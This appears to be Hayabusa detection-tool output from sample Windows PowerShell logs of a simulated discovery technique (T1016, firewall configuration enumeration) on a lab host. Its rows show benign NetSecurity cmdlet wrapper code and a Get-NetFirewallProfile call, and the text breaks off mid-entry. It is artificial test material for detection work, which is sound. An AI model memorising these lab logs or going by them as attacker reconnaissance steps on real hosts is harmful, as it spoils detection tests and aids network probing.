$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.207 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.364 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.473 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more 